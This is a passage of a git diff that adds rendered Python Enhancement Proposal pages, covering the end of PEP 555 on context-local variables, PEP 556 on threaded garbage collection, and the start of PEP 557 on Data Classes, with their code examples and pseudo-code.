+
+
+
+
+
+

Special functionality for framework authors

+

Frameworks, such as asyncio or third-party libraries, can use additional functionality in contextvars to achieve the desired semantics in cases which are not determined by the Python interpreter. Some of the semantics described in this section are also afterwards used to describe the internal implementation.

+
+

Leaking yields

+

Using the contextvars.leaking_yields decorator, one can choose to leak the context through yield expressions into the outer context that drives the generator:

+
@contextvars.leaking_yields
+def genfunc():
+    assert cvar.value == "outer"
+    with cvar.assign("inner"):
+        yield
+        assert cvar.value == "inner"
+    assert cvar.value == "outer"
+
+g = genfunc():
+with cvar.assign("outer"):
+    assert cvar.value == "outer"
+    next(g)
+    assert cvar.value == "inner"
+    next(g)
+    assert cvar.value == "outer"
+
+
+
+
+

Capturing contextvar assignments

+

Using contextvars.capture(), one can capture the assignment contexts that are entered by a block of code. The changes applied by the block of code can then be reverted and subsequently reapplied, even in another context:

+
assert cvar1.value is None # default
+assert cvar2.value is None # default
+assi1 = cvar1.assign(value1)
+assi2 = cvar1.assign(value2)
+with contextvars.capture() as delta:
+    assi1.__enter__()
+    with cvar2.assign("not captured"):
+        assert cvar2.value is "not captured"
+    assi2.__enter__()
+assert cvar1.value is value2
+delta.revert()
+assert cvar1.value is None
+assert cvar2.value is None
+...
+with cvar1.assign(1), cvar2.assign(2):
+    delta.reapply()
+    assert cvar1.value is value2
+    assert cvar2.value == 2
+
+
+

However, reapplying the “delta” if its net contents include deassignments may not be possible (see also Implementation and Open Issues).

+
+
+

Getting a snapshot of context state

+

The function contextvars.get_local_state() returns an object representing the applied assignments to all context-local variables in the context where the function is called. This can be seen as equivalent to using contextvars.capture() to capture all context changes from the beginning of execution. The returned object supports methods .revert() and reapply() as above.

+
+
+

Running code in a clean state

+

Although it is possible to revert all applied context changes using the above primitives, a more convenient way to run a block of code in a clean context is provided:

+
with context_vars.clean_context():
+    # here, all context vars start off with their default values
+# here, the state is back to what it was before the with block.
+
+
+
+
+
+

Implementation

+

This section describes to a variable level of detail how the described semantics can be implemented. At present, an implementation aimed at simplicity but sufficient features is described. More details will be added later.

+

Alternatively, a somewhat more complicated implementation offers minor additional features while adding some performance overhead and requiring more code in the implementation.

+
+

Data structures and implementation of the core concept

+

Each thread of the Python interpreter keeps its own stack of contextvars.Assignment objects, each having a pointer to the previous (outer) assignment like in a linked list. The local state (also returned by contextvars.get_local_state()) then consists of a reference to the top of the stack and a pointer/weak reference to the bottom of the stack. This allows efficient stack manipulations. An object produced by contextvars.capture() is similar, but refers to only a part of the stack with the bottom reference pointing to the top of the stack as it was in the beginning of the capture block.

+

Now, the stack evolves according to the assignment __enter__ and __exit__ methods. For example:

+
cvar1 = contextvars.Var()
+cvar2 = contextvars.Var()
+# stack: []
+assert cvar1.value is None
+assert cvar2.value is None
+
+with cvar1.assign("outer"):
+    # stack: [Assignment(cvar1, "outer")]
+    assert cvar1.value == "outer"
+
+    with cvar1.assign("inner"):
+        # stack: [Assignment(cvar1, "outer"),
+        #         Assignment(cvar1, "inner")]
+        assert cvar1.value == "inner"
+
+        with cvar2.assign("hello"):
+            # stack: [Assignment(cvar1, "outer"),
+            #         Assignment(cvar1, "inner"),
+            #         Assignment(cvar2, "hello")]
+            assert cvar2.value == "hello"
+
+        # stack: [Assignment(cvar1, "outer"),
+        #         Assignment(cvar1, "inner")]
+        assert cvar1.value == "inner"
+        assert cvar2.value is None
+
+    # stack: [Assignment(cvar1, "outer")]
+    assert cvar1.value == "outer"
+
+# stack: []
+assert cvar1.value is None
+assert cvar2.value is None
+
+
+

Getting a value from the context using cvar1.value can be implemented as finding the topmost occurrence of a cvar1 assignment on the stack and returning the value there, or the default value if no assignment is found on the stack. However, this can be optimized to instead be an O(1) operation in most cases. Still, even searching through the stack may be reasonably fast since these stacks are not intended to grow very large.

+

The above description is already sufficient for implementing the core concept. Suspendable frames require some additional attention, as explained in the following.

+
+
+

Implementation of generator and coroutine semantics

+

Within generators, coroutines and async generators, assignments and deassignments are handled in exactly the same way as anywhere else. However, some changes are needed in the builtin generator methods send, __next__, throw and close. Here is the Python equivalent of the changes needed in send for a generator (here _old_send refers to the behavior in Python 3.6):

+
def send(self, value):
+    if self.gi_contextvars is LEAK:
+        # If decorated with contextvars.leaking_yields.
+        # Nothing needs to be done to leak context through yields :)
+        return self._old_send(value)
+    try:
+        with contextvars.capture() as delta:
+            if self.gi_contextvars:
+                # non-zero captured content from previous iteration
+                self.gi_contextvars.reapply()
+            ret = self._old_send(value)
+    except Exception:
+        raise  # back to the calling frame (e.g. StopIteration)
+    else:
+        # suspending, revert context changes but save them for later
+        delta.revert()
+        self.gi_contextvars = delta
+    return ret
+
+
+

The corresponding modifications to the other methods is essentially identical. The same applies to coroutines and async generators.

+

For code that does not use contextvars, the additions are O(1) and essentially reduce to a couple of pointer comparisons. For code that does use contextvars, the additions are still O(1) in most cases.

+
+
+

More on implementation

+

The rest of the functionality, including contextvars.leaking_yields, contextvars.capture(), contextvars.get_local_state() and contextvars.clean_context() are in fact quite straightforward to implement, but their implementation will be discussed further in later versions of this proposal. Caching of assigned values is somewhat more complicated, and will be discussed later, but it seems that most cases should achieve O(1) complexity.

+
+
+
+
+

Backwards compatibility

+

There are no direct backwards-compatibility concerns, since a completely new feature is proposed.

+

However, various traditional uses of thread-local storage may need a smooth transition to contextvars so they can be concurrency-safe. There are several approaches to this, including emulating task-local storage with a little bit of help from async frameworks. A fully general implementation cannot be provided, because the desired semantics may depend on the design of the framework.

+

Another way to deal with the transition is for code to first look for a context created using contextvars. If that fails because a new-style context has not been set or because the code runs on an older Python version, a fallback to thread-local storage is used.

+
+
+

Open Issues

+
+

Out-of-order de-assignments

+

In this proposal, all variable deassignments are made in the opposite order compared to the preceding assignments. This has two useful properties: it encourages using with statements to define assignment scope and has a tendency to catch errors early (forgetting a .__exit__() call often results in a meaningful error. To have this as a requirement is beneficial also in terms of implementation simplicity and performance. Nevertheless, allowing out-of-order context exits is not completely out of the question, and reasonable implementation strategies for that do exist.

+
+
+
+

Rejected Ideas

+
+

Dynamic scoping linked to subroutine scopes

+

The scope of value visibility should not be determined by the way the code is refactored into subroutines. It is necessary to have per-variable control of the assignment scope.

+
+
+
+

Acknowledgements

+

To be added.

+
+
+

References

+

To be added.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0555.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0556/index.html b/pep-0556/index.html new file mode 100644 index 00000000000..2d84645e67c --- /dev/null +++ b/pep-0556/index.html @@ -0,0 +1,567 @@ + + + + + + + + PEP 556 – Threaded garbage collection | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 556 – Threaded garbage collection

+
+
Author:
+
Antoine Pitrou <solipsis at pitrou.net>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
08-Sep-2017
+
Python-Version:
+
3.7
+
Post-History:
+
08-Sep-2017
+
+
+
+
Table of Contents +
+
+

Deferral Notice

+

This PEP is currently not being actively worked on. It may be revived +in the future. The main missing steps are:

+
    +
  • polish the implementation, adapting the test suite where necessary;
  • +
  • ensure setting threaded garbage collection does not disrupt existing +code in unexpected ways (expected impact includes lengthening the +lifetime of objects in reference cycles).
  • +
+
+
+

Abstract

+

This PEP proposes a new optional mode of operation for CPython’s cyclic +garbage collector (GC) where implicit (i.e. opportunistic) collections +happen in a dedicated thread rather than synchronously.

+
+
+

Terminology

+

An “implicit” GC run (or “implicit” collection) is one that is triggered +opportunistically based on a certain heuristic computed over allocation +statistics, whenever a new allocation is requested. Details of the +heuristic are not relevant to this PEP, as it does not propose to change it.

+

An “explicit” GC run (or “explicit” collection) is one that is requested +programmatically by an API call such as gc.collect.

+

“Threaded” refers to the fact that GC runs happen in a dedicated thread +separate from sequential execution of application code. It does not mean +“concurrent” (the Global Interpreter Lock, or GIL, still serializes +execution among Python threads including the dedicated GC thread) +nor “parallel” (the GC is not able to distribute its work onto several +threads at once to lower wall-clock latencies of GC runs).

+
+
+

Rationale

+

The mode of operation for the GC has always been to perform implicit +collections synchronously. That is, whenever the aforementioned heuristic +is activated, execution of application code in the current thread is +suspended and the GC is launched in order to reclaim dead reference +cycles.

+

There is a catch, though. Over the course of reclaiming dead reference +cycles (and any ancillary objects hanging at those cycles), the GC can +execute arbitrary finalization code in the form of __del__ methods +and weakref callbacks. Over the years, Python has been used for more +and more sophisticated purposes, and it is increasingly common for +finalization code to perform complex tasks, for example in distributed +systems where loss of an object may require notifying other (logical +or physical) nodes.

+

Interrupting application code at arbitrary points to execute finalization +code that may rely on a consistent internal state and/or on acquiring +synchronization primitives gives rise to reentrancy issues that even the +most seasoned experts have trouble fixing properly [1].

+

This PEP bases itself on the observation that, despite the apparent +similarities, same-thread reentrancy is a fundamentally harder +problem than multi-thread synchronization. Instead of letting each +developer or library author struggle with extremely hard reentrancy +issues, one by one, this PEP proposes to allow the GC to run in a +separate thread where well-known multi-thread synchronization practices +are sufficient.

+
+
+

Proposal

+

Under this PEP, the GC has two modes of operation:

+
    +
  • “serial”, which is the default and legacy mode, where an implicit GC +run is performed immediately in the thread that detects such an implicit +run is desired (based on the aforementioned allocation heuristic).
  • +
  • “threaded”, which can be explicitly enabled at runtime on a per-process +basis, where implicit GC runs are scheduled whenever the allocation +heuristic is triggered, but run in a dedicated background thread.
  • +
+

Hard reentrancy problems which plague sophisticated uses of finalization +callbacks in the “serial” mode become relatively easy multi-thread +synchronization problems in the “threaded” mode of operation.

+

The GC also traditionally allows for explicit GC runs, using the Python +API gc.collect and the C API PyGC_Collect. The visible semantics +of these two APIs are left unchanged: they perform a GC run immediately +when called, and only return when the GC run is finished.

+
+

New public APIs

+

Two new Python APIs are added to the gc module:

+
    +
  • gc.set_mode(mode) sets the current mode of operation (either “serial” +or “threaded”). If setting to “serial” and the current mode is +“threaded”, then the function also waits for the GC thread to end.
  • +
  • gc.get_mode() returns the current mode of operation.
  • +
+

It is allowed to switch back and forth between modes of operation.

+
+
+

Intended use

+

Given the per-process nature of the switch and its repercussions on +semantics of all finalization callbacks, it is recommended that it is +set at the beginning of an application’s code (and/or in initializers +for child processes e.g. when using multiprocessing). Library functions +should probably not mess with this setting, just as they shouldn’t call +gc.enable or gc.disable, but there’s nothing to prevent them from +doing so.

+
+
+

Non-goals

+

This PEP does not address reentrancy issues with other kinds of +asynchronous code execution (for example signal handlers registered +with the signal module). The author believes that the overwhelming +majority of painful reentrancy issues occur with finalizers. Most of the +time, signal handlers are able to set a single flag and/or wake up a +file descriptor for the main program to notice. As for those signal +handlers which raise an exception, they have to execute in-thread.

+

This PEP also does not change the execution of finalization callbacks +when they are called as part of regular reference counting, i.e. when +releasing a visible reference drops an object’s reference count to zero. +Since such execution happens at deterministic points in code, it is usually +not a problem.

+
+
+
+

Internal details

+

TODO: Update this section to conform to the current implementation.

+
+

gc module

+

An internal flag gc_is_threaded is added, telling whether GC is serial +or threaded.

+

An internal structure gc_mutex is added to avoid two GC runs at once:

+
static struct {
+    PyThread_type_lock lock;  /* taken when collecting */
+    PyThreadState *owner;  /* whichever thread is currently collecting
+                              (NULL if no collection is taking place) */
+} gc_mutex;
+
+
+

An internal structure gc_thread is added to handle synchronization with +the GC thread:

+
static struct {
+   PyThread_type_lock wakeup; /* acts as an event
+                                 to wake up the GC thread */
+   int collection_requested; /* non-zero if collection requested */
+   PyThread_type_lock done; /* acts as an event signaling
+                               the GC thread has exited */
+} gc_thread;
+
+
+
+
+

threading module

+

Two private functions are added to the threading module:

+
    +
  • threading._ensure_dummy_thread(name) creates and registers a Thread +instance for the current thread with the given name, and returns it.
  • +
  • threading._remove_dummy_thread(thread) removes the given thread +(as returned by _ensure_dummy_thread) from the threading module’s +internal state.
  • +
+

The purpose of these two functions is to improve debugging and introspection +by letting threading.current_thread() return a more meaningfully-named +object when called inside a finalization callback in the GC thread.

+
+
+

Pseudo-code

+

Here is a proposed pseudo-code for the main primitives, public and internal, +required for implementing this PEP. All of them will be implemented in C +and live inside the gc module, unless otherwise noted:

+
def collect_with_callback(generation):
+    """
+    Collect up to the given *generation*.
+    """
+    # Same code as currently (see collect_with_callback() in gcmodule.c)
+
+
+def collect_generations():
+    """
+    Collect as many generations as desired by the heuristic.
+    """
+    # Same code as currently (see collect_generations() in gcmodule.c)
+
+
+def lock_and_collect(generation=-1):
+    """
+    Perform a collection with thread safety.
+    """
+    me = PyThreadState_GET()
+    if gc_mutex.owner == me:
+        # reentrant GC collection request, bail out
+        return
+    Py_BEGIN_ALLOW_THREADS
+    gc_mutex.lock.acquire()
+    Py_END_ALLOW_THREADS
+    gc_mutex.owner = me
+    try:
+        if generation >= 0:
+            return collect_with_callback(generation)
+        else:
+            return collect_generations()
+    finally:
+        gc_mutex.owner = NULL
+        gc_mutex.lock.release()
+
+
+def schedule_gc_request():
+    """
+    Ask the GC thread to run an implicit collection.
+    """
+    assert gc_is_threaded == True
+    # Note this is extremely fast if a collection is already requested
+    if gc_thread.collection_requested == False:
+        gc_thread.collection_requested = True
+        gc_thread.wakeup.release()
+
+
+def is_implicit_gc_desired():
+    """
+    Whether an implicit GC run is currently desired based on allocation
+    stats.  Return a generation number, or -1 if none desired.
+    """
+    # Same heuristic as currently (see _PyObject_GC_Alloc in gcmodule.c)
+
+
+def PyGC_Malloc():
+    """
+    Allocate a GC-enabled object.
+    """
+    # Update allocation statistics (same code as currently, omitted for brevity)
+    if is_implicit_gc_desired():
+        if gc_is_threaded:
+            schedule_gc_request()
+        else:
+            lock_and_collect()
+    # Go ahead with allocation (same code as currently, omitted for brevity)
+
+
+def gc_thread(interp_state):
+    """
+    Dedicated loop for threaded GC.
+    """
+    # Init Python thread state (omitted, see t_bootstrap in _threadmodule.c)
+    # Optional: init thread in Python threading module, for better introspection
+    me = threading._ensure_dummy_thread(name="GC thread")
+
+    while gc_is_threaded == True:
+        Py_BEGIN_ALLOW_THREADS
+        gc_thread.wakeup.acquire()
+        Py_END_ALLOW_THREADS
+        if gc_thread.collection_requested != 0:
+            gc_thread.collection_requested = 0
+            lock_and_collect(generation=-1)
+
+    threading._remove_dummy_thread(me)
+    # Signal we're exiting
+    gc_thread.done.release()
+    # Free Python thread state (omitted)
+
+
+def gc.set_mode(mode):
+    """
+    Set current GC mode.  This is a process-global setting.
+    """
+    if mode == "threaded":
+        if not gc_is_threaded == False:
+            # Launch thread
+            gc_thread.done.acquire(block=False)  # should not fail
+            gc_is_threaded = True
+            PyThread_start_new_thread(gc_thread)
+    elif mode == "serial":
+        if gc_is_threaded == True:
+            # Wake up thread, asking it to end
+            gc_is_threaded = False
+            gc_thread.wakeup.release()
+            # Wait for thread exit
+            Py_BEGIN_ALLOW_THREADS
+            gc_thread.done.acquire()
+            Py_END_ALLOW_THREADS
+            gc_thread.done.release()
+    else:
+        raise ValueError("unsupported mode %r" % (mode,))
+
+
+def gc.get_mode(mode):
+    """
+    Get current GC mode.
+    """
+    return "threaded" if gc_is_threaded else "serial"
+
+
+def gc.collect(generation=2):
+    """
+    Schedule collection of the given generation and wait for it to
+    finish.
+    """
+    return lock_and_collect(generation)
+
+
+
+
+
+

Discussion

+
+

Default mode

+

One may wonder whether the default mode should simply be changed to “threaded”. +For multi-threaded applications, it would probably not be a problem: +those applications must already be prepared for finalization handlers to +be run in arbitrary threads. In single-thread applications, however, it +is currently guaranteed that finalizers will always be called in the main +thread. Breaking this property may induce subtle behaviour changes or bugs, +for example if finalizers rely on some thread-local values.

+

Another problem is when a program uses fork() for concurrency. +Calling fork() from a single-threaded program is safe, +but it’s fragile (to say the least) if the program is multi-threaded.

+
+
+

Explicit collections

+

One may ask whether explicit collections should also be delegated to the +background thread. The answer is it doesn’t really matter: since +gc.collect and PyGC_Collect actually wait for the collection to +end (breaking this property would break compatibility), delegating the +actual work to a background thread wouldn’t ease synchronization with the +thread requesting an explicit collection.

+

In the end, this PEP choses the behaviour that seems simpler to implement +based on the pseudo-code above.

+
+
+

Impact on memory use

+

The “threaded” mode incurs a slight delay in implicit collections compared +to the default “serial” mode. This obviously may change the memory profile +of certain applications. By how much remains to be measured in real-world +use, but we expect the impact to remain minor and bearable. First because +implicit collections are based on a heuristic whose effect does not result +in deterministic visible behaviour anyway. Second because the GC deals +with reference cycles while many objects are reclaimed immediately when their +last visible reference disappears.

+
+
+

Impact on CPU consumption

+

The pseudo-code above adds two lock operations for each implicit collection +request in “threaded” mode: one in the thread making the request (a +release call) and one in the GC thread (an acquire call). +It also adds two other lock operations, regardless of the current mode, +around each actual collection.

+

We expect the cost of those lock operations to be very small, on modern +systems, compared to the actual cost of crawling through the chains of +pointers during the collection itself (“pointer chasing” being one of +the hardest workloads on modern CPUs, as it lends itself poorly to +speculation and superscalar execution).

+

Actual measurements on worst-case mini-benchmarks may help provide +reassuring upper bounds.

+
+
+

Impact on GC pauses

+

While this PEP does not concern itself with GC pauses, there is a +practical chance that releasing the GIL at some point during an implicit +collection (for example by virtue of executing a pure Python finalizer) +will allow application code to run in-between, lowering the visible GC +pause time for some applications.

+

If this PEP is accepted, future work may try to better realize this potential +by speculatively releasing the GIL during collections, though it is unclear +how doable that is.

+
+
+
+

Open issues

+
    +
  • gc.set_mode should probably be protected against multiple concurrent +invocations. Also, it should raise when called from inside a GC run +(i.e. from a finalizer).
  • +
  • What happens at shutdown? Does the GC thread run until _PyGC_Fini() +is called?
  • +
+
+
+

Implementation

+

A draft implementation is available in the threaded_gc branch +[2] of the author’s Github fork [3].

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0556.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0557/index.html b/pep-0557/index.html new file mode 100644 index 00000000000..18c1c24e9eb --- /dev/null +++ b/pep-0557/index.html @@ -0,0 +1,1090 @@ + + + + + + + + PEP 557 – Data Classes | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 557 – Data Classes

+
+
Author:
+
Eric V. Smith <eric at trueblade.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
02-Jun-2017
+
Python-Version:
+
3.7
+
Post-History:
+
08-Sep-2017, 25-Nov-2017, 30-Nov-2017, 01-Dec-2017, 02-Dec-2017, 06-Jan-2018, 04-Mar-2018
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Notice for Reviewers

+

This PEP and the initial implementation were drafted in a separate +repo: https://github.com/ericvsmith/dataclasses. Before commenting in +a public forum please at least read the discussion listed at the +end of this PEP.

+
+
+

Abstract

+

This PEP describes an addition to the standard library called Data +Classes. Although they use a very different mechanism, Data Classes +can be thought of as “mutable namedtuples with defaults”. Because +Data Classes use normal class definition syntax, you are free to use +inheritance, metaclasses, docstrings, user-defined methods, class +factories, and other Python class features.

+

A class decorator is provided which inspects a class definition for +variables with type annotations as defined in PEP 526, “Syntax for +Variable Annotations”. In this document, such variables are called +fields. Using these fields, the decorator adds generated method +definitions to the class to support instance initialization, a repr, +comparison methods, and optionally other methods as described in the +Specification section. Such a class is called a Data Class, but +there’s really nothing special about the class: the decorator adds +generated methods to the class and returns the same class it was +given.

+

As an example:

+
@dataclass
+class InventoryItem:
+    '''Class for keeping track of an item in inventory.'''
+    name: str
+    unit_price: float
+    quantity_on_hand: int = 0
+
+    def total_cost(self) -> float:
+        return self.unit_price * self.quantity_on_hand
+
+
+

The @dataclass decorator will add the equivalent of these methods +to the InventoryItem class:

+
def __init__(self, name: str, unit_price: float, quantity_on_hand: int = 0) -> None:
+    self.name = name
+    self.unit_price = unit_price
+    self.quantity_on_hand = quantity_on_hand
+def __repr__(self):
+    return f'InventoryItem(name={self.name!r}, unit_price={self.unit_price!r}, quantity_on_hand={self.quantity_on_hand!r})'
+def __eq__(self, other):
+    if other.__class__ is self.__class__:
+        return (self.name, self.unit_price, self.quantity_on_hand) == (other.name, other.unit_price, other.quantity_on_hand)
+    return NotImplemented
+def __ne__(self, other):
+    if other.__class__ is self.__class__:
+        return (self.name, self.unit_price, self.quantity_on_hand) != (other.name, other.unit_price, other.quantity_on_hand)
+    return NotImplemented
+def __lt__(self, other):
+    if other.__class__ is self.__class__:
+        return (self.name, self.unit_price, self.quantity_on_hand) < (other.name, other.unit_price, other.quantity_on_hand)
+    return NotImplemented
+def __le__(self, other):
+    if other.__class__ is self.__class__:
+        return (self.name, self.unit_price, self.quantity_on_hand) <= (other.name, other.unit_price, other.quantity_on_hand)
+    return NotImplemented
+def __gt__(self, other):
+    if other.__class__ is self.__class__:
+        return (self.name, self.unit_price, self.quantity_on_hand) > (other.name, other.unit_price, other.quantity_on_hand)
+    return NotImplemented
+def __ge__(self, other):
+    if other.__class__ is self.__class__:
+        return (self.name, self.unit_price, self.quantity_on_hand) >= (other.name, other.unit_price, other.quantity_on_hand)
+    return NotImplemented
+
+
+

Data Classes save you from writing and maintaining these methods.

+
+
+

Rationale

+

There have been numerous attempts to define classes which exist +primarily to store values which are accessible by attribute lookup. +Some examples include:

+
    +
  • collections.namedtuple in the standard library.
  • +
  • typing.NamedTuple in the standard library.
  • +
  • The popular attrs [1] project.
  • +
  • George Sakkis’ recordType recipe [2], a mutable data type inspired +by collections.namedtuple.
  • +
  • Many example online recipes [3], packages [4], and questions [5]. +David Beazley used a form of data classes as the motivating example +in a PyCon 2013 metaclass talk [6].
  • +
+

So, why is this PEP needed?

+

With the addition of PEP 526, Python has a concise way to specify the +type of class members. This PEP leverages that syntax to provide a +simple, unobtrusive way to describe Data Classes. With two exceptions, +the specified attribute type annotation is completely ignored by Data +Classes.

+

No base classes or metaclasses are used by Data Classes. Users of +these classes are free to use inheritance and metaclasses without any +interference from Data Classes. The decorated classes are truly +“normal” Python classes. The Data Class decorator should not +interfere with any usage of the class.

+

One main design goal of Data Classes is to support static type +checkers. The use of PEP 526 syntax is one example of this, but so is +the design of the fields() function and the @dataclass +decorator. Due to their very dynamic nature, some of the libraries +mentioned above are difficult to use with static type checkers.

+

Data Classes are not, and are not intended to be, a replacement +mechanism for all of the above libraries. But being in the standard +library will allow many of the simpler use cases to instead leverage +Data Classes. Many of the libraries listed have different feature +sets, and will of course continue to exist and prosper.

+

Where is it not appropriate to use Data Classes?

+
    +
  • API compatibility with tuples or dicts is required.
  • +
  • Type validation beyond that provided by PEPs 484 and 526 is +required, or value validation or conversion is required.
  • +
+
+
+

Specification

+

All of the functions described in this PEP will live in a module named +dataclasses.

+

A function dataclass which is typically used as a class decorator +is provided to post-process classes and add generated methods, +described below.

+

The dataclass decorator examines the class to find fields. A +field is defined as any variable identified in +__annotations__. That is, a variable that has a type annotation. +With two exceptions described below, none of the Data Class machinery +examines the type specified in the annotation.

+

Note that __annotations__ is guaranteed to be an ordered mapping, +in class declaration order. The order of the fields in all of the +generated methods is the order in which they appear in the class.

+

The dataclass decorator will add various “dunder” methods to the +class, described below. If any of the added methods already exist on the +class, a TypeError will be raised. The decorator returns the same +class that is called on: no new class is created.

+

The dataclass decorator is typically used with no parameters and +no parentheses. However, it also supports the following logical +signature:

+
def dataclass(*, init=True, repr=True, eq=True, order=False, unsafe_hash=False, frozen=False)
+
+
+

If dataclass is used just as a simple decorator with no +parameters, it acts as if it has the default values documented in this +signature. That is, these three uses of @dataclass are equivalent:

+
@dataclass
+class C:
+    ...
+
+@dataclass()
+class C:
+    ...
+
+@dataclass(init=True, repr=True, eq=True, order=False, unsafe_hash=False, frozen=False)
+class C:
+    ...
+
+
+

The parameters to dataclass are:

+
    +
  • init: If true (the default), a __init__ method will be +generated.
  • +
  • repr: If true (the default), a __repr__ method will be +generated. The generated repr string will have the class name and +the name and repr of each field, in the order they are defined in +the class. Fields that are marked as being excluded from the repr +are not included. For example: +InventoryItem(name='widget', unit_price=3.0, quantity_on_hand=10).

    If the class already defines __repr__, this parameter is +ignored.

    +
  • +
  • eq: If true (the default), an __eq__ method will be +generated. This method compares the class as if it were a tuple of its +fields, in order. Both instances in the comparison must be of the +identical type.

    If the class already defines __eq__, this parameter is ignored.

    +
  • +
  • order: If true (the default is False), __lt__, __le__, +__gt__, and __ge__ methods will be generated. These compare +the class as if it were a tuple of its fields, in order. Both +instances in the comparison must be of the identical type. If +order is true and eq is false, a ValueError is raised.

    If the class already defines any of __lt__, __le__, +__gt__, or __ge__, then ValueError is raised.

    +
  • +
  • unsafe_hash: If False (the default), the __hash__ method +is generated according to how eq and frozen are set.

    If eq and frozen are both true, Data Classes will generate a +__hash__ method for you. If eq is true and frozen is +false, __hash__ will be set to None, marking it unhashable +(which it is). If eq is false, __hash__ will be left +untouched meaning the __hash__ method of the superclass will be +used (if the superclass is object, this means it will fall back +to id-based hashing).

    +

    Although not recommended, you can force Data Classes to create a +__hash__ method with unsafe_hash=True. This might be the +case if your class is logically immutable but can nonetheless be +mutated. This is a specialized use case and should be considered +carefully.

    +

    If a class already has an explicitly defined __hash__ the +behavior when adding __hash__ is modified. An explicitly +defined __hash__ is defined when:

    +
    +
      +
    • __eq__ is defined in the class and __hash__ is defined +with any value other than None.
    • +
    • __eq__ is defined in the class and any non-None +__hash__ is defined.
    • +
    • __eq__ is not defined on the class, and any __hash__ is +defined.
    • +
    +
    +

    If unsafe_hash is true and an explicitly defined __hash__ +is present, then ValueError is raised.

    +

    If unsafe_hash is false and an explicitly defined __hash__ +is present, then no __hash__ is added.

    +

    See the Python documentation [7] for more information.

    +
  • +
  • frozen: If true (the default is False), assigning to fields will +generate an exception. This emulates read-only frozen instances. +If either __getattr__ or __setattr__ is defined in the +class, then ValueError is raised. See the discussion below.
  • +
+

fields may optionally specify a default value, using normal +Python syntax:

+
@dataclass
+class C:
+    a: int       # 'a' has no default value
+    b: int = 0   # assign a default value for 'b'
+
+
+

In this example, both a and b will be included in the added +__init__ method, which will be defined as:

+
def __init__(self, a: int, b: int = 0):
+
+
+

TypeError will be raised if a field without a default value +follows a field with a default value. This is true either when this +occurs in a single class, or as a result of class inheritance.

+

For common and simple use cases, no other functionality is required. +There are, however, some Data Class features that require additional +per-field information. To satisfy this need for additional +information, you can replace the default field value with a call to +the provided field() function. The signature of field() is:

+
def field(*, default=MISSING, default_factory=MISSING, repr=True,
+          hash=None, init=True, compare=True, metadata=None)
+
+
+

The MISSING value is a sentinel object used to detect if the +default and default_factory parameters are provided. This +sentinel is used because None is a valid value for default.

+

The parameters to field() are:

+
    +
  • default: If provided, this will be the default value for this +field. This is needed because the field call itself replaces +the normal position of the default value.
  • +
  • default_factory: If provided, it must be a zero-argument +callable that will be called when a default value is needed for this +field. Among other purposes, this can be used to specify fields +with mutable default values, as discussed below. It is an error to +specify both default and default_factory.
  • +
  • init: If true (the default), this field is included as a +parameter to the generated __init__ method.
  • +
  • repr: If true (the default), this field is included in the +string returned by the generated __repr__ method.
  • +
  • compare: If True (the default), this field is included in the +generated equality and comparison methods (__eq__, __gt__, +et al.).
  • +
  • hash: This can be a bool or None. If True, this field is +included in the generated __hash__ method. If None (the +default), use the value of compare: this would normally be the +expected behavior. A field should be considered in the hash if +it’s used for comparisons. Setting this value to anything other +than None is discouraged.

    One possible reason to set hash=False but compare=True would +be if a field is expensive to compute a hash value for, that field +is needed for equality testing, and there are other fields that +contribute to the type’s hash value. Even if a field is excluded +from the hash, it will still be used for comparisons.

    +
  • +
  • metadata: This can be a mapping or None. None is treated as an +empty dict. This value is wrapped in types.MappingProxyType to +make it read-only, and exposed on the Field object. It is not used +at all by Data Classes, and is provided as a third-party extension +mechanism. Multiple third-parties can each have their own key, to +use as a namespace in the metadata.
  • +
+

If the default value of a field is specified by a call to field(), +then the class attribute for this field will be replaced by the +specified default value. If no default is provided, then the +class attribute will be deleted. The intent is that after the +dataclass decorator runs, the class attributes will all contain +the default values for the fields, just as if the default value itself +were specified. For example, after:

+
@dataclass
+class C:
+    x: int
+    y: int = field(repr=False)
+    z: int = field(repr=False, default=10)
+    t: int = 20
+
+
+

The class attribute C.z will be 10, the class attribute +C.t will be 20, and the class attributes C.x and C.y +will not be set.

+
+

Field objects

+

Field objects describe each defined field. These objects are +created internally, and are returned by the fields() module-level +method (see below). Users should never instantiate a Field +object directly. Its documented attributes are:

+
    +
  • name: The name of the field.
  • +
  • type: The type of the field.
  • +
  • default, default_factory, init, repr, hash, +compare, and metadata have the identical meaning and values +as they do in the field() declaration.
  • +
+

Other attributes may exist, but they are private and must not be +inspected or relied on.

+
+
+

post-init processing

+

The generated __init__ code will call a method named +__post_init__, if it is defined on the class. It will be called +as self.__post_init__(). If no __init__ method is generated, +then __post_init__ will not automatically be called.

+

Among other uses, this allows for initializing field values that +depend on one or more other fields. For example:

+
@dataclass
+class C:
+    a: float
+    b: float
+    c: float = field(init=False)
+
+    def __post_init__(self):
+        self.c = self.a + self.b
+
+
+

See the section below on init-only variables for ways to pass +parameters to __post_init__(). Also see the warning about how +replace() handles init=False fields.

+
+
+

Class variables

+

One place where dataclass actually inspects the type of a field is +to determine if a field is a class variable as defined in PEP 526. It +does this by checking if the type of the field is typing.ClassVar. +If a field is a ClassVar, it is excluded from consideration as a +field and is ignored by the Data Class mechanisms. For more +discussion, see [8]. Such ClassVar pseudo-fields are not +returned by the module-level fields() function.

+
+
+

Init-only variables

+

